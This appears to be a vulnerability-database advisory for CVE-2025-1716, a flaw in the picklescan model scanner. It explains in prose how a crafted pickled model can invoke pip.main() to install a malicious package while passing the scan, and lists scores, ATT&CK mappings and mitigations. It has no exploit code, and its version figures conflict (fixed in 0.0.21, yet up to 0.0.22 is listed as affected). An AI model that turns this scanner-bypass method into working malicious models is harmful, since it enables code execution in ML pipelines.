Cyber Resilience

CVE-2025-1716

MediumPublic PoC

Published: 26 February 2025

Published
26 February 2025
Modified
29 December 2025
KEV Added
Patch
CVSS Score v4 5.3 CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.1625 95.0th percentile
Risk Priority 20 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-1716 is a medium-severity Incomplete List of Disallowed Inputs (CWE-184) vulnerability in Mmaitre314 Picklescan. Its CVSS base score is 5.3 (Medium).

Operationally, exploitation aligns with the MITRE ATT&CK technique Python (T1059.006); ranked in the top 5.0% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and RA-5 (Vulnerability Monitoring and Scanning).

Deeper analysis

picklescan versions prior to 0.0.21 contain a flaw in which the scanner does not classify the 'pip' module as an unsafe global when inspecting pickled Python objects. The affected component is the picklescan library itself, which is used to detect dangerous constructs in serialized machine-learning models before they are loaded.

An attacker can therefore craft a malicious pickled model that invokes pip.main() to fetch and install an arbitrary package from PyPI or a GitHub-hosted repository. Because the call is not flagged, the model passes the scan and can later execute the attacker-supplied package when deserialized, achieving unauthorized code execution or environment tampering with no user interaction beyond loading the model.

The GitHub advisory GHSA-655q-fx9r-782v and the referenced commit 78ce704227c51f070c0c5fb4b466d92c62a7aa3d correct the issue by adding 'pip' to the set of restricted globals; Sonatype has mirrored the same remediation guidance for CVE-2025-1716.

The associated EPSS score has remained flat at 0.1625 since disclosure, indicating no measurable rise in observed exploitation interest, though the vulnerability is directly relevant to machine-learning pipelines that depend on pickle-based model serialization.

EU & UK References

Vulnerability details

picklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craft a malicious model that uses Pickle to pull in a malicious PyPI package (hosted, for example, on pypi.org or GitHub) via `pip.main()`. Because pip is…

more

not a restricted global, the model, when scanned with picklescan, would pass security checks and appear to be safe, when it could instead prove to be problematic.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1059.006 Python Execution
Adversaries may abuse Python commands and scripts for execution.
T1105 Ingress Tool Transfer Command And Control
Adversaries may transfer tools or other files from an external system into a compromised environment.
T1203 Exploitation for Client Execution Execution
Adversaries may exploit software vulnerabilities in client applications to execute code.
T1211 Exploitation for Stealth Stealth
Adversaries may exploit vulnerabilities to evade detection by hiding activity, suppressing logging, or operating within trusted or unmonitored components.
Why these techniques?

Vulnerability in picklescan enables evasion of static analysis (T1211), exploitation for client-side code execution via unsafe pickle deserialization (T1203), Python interpreter abuse to invoke pip.main (T1059.006), and ingress of malicious packages from PyPI/GitHub (T1105).

CVEs Like This One

CVE-2025-10156Same product: Mmaitre314 Picklescan
CVE-2025-1945Same product: Mmaitre314 Picklescan
CVE-2025-1889Same product: Mmaitre314 Picklescan
CVE-2026-41206Shared CWE-184
CVE-2026-41264Shared CWE-184
CVE-2026-33139Shared CWE-184
CVE-2026-41934Shared CWE-184
CVE-2026-31992Shared CWE-184
CVE-2026-1773Shared CWE-184
CVE-2026-32017Shared CWE-184

Affected Assets

mmaitre314
picklescan
≤ 0.0.22

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Flaw remediation ensures timely upgrading of picklescan to version 0.0.21 or later, directly addressing the failure to restrict 'pip' as an unsafe global.

preventdetect

Malicious code protection scans for threats like those in pickle files that bypass picklescan and invoke pip to install harmful PyPI packages.

detect

Vulnerability monitoring and scanning identifies the CVE-2025-1716 flaw in picklescan versions before 0.0.21 for remediation.

References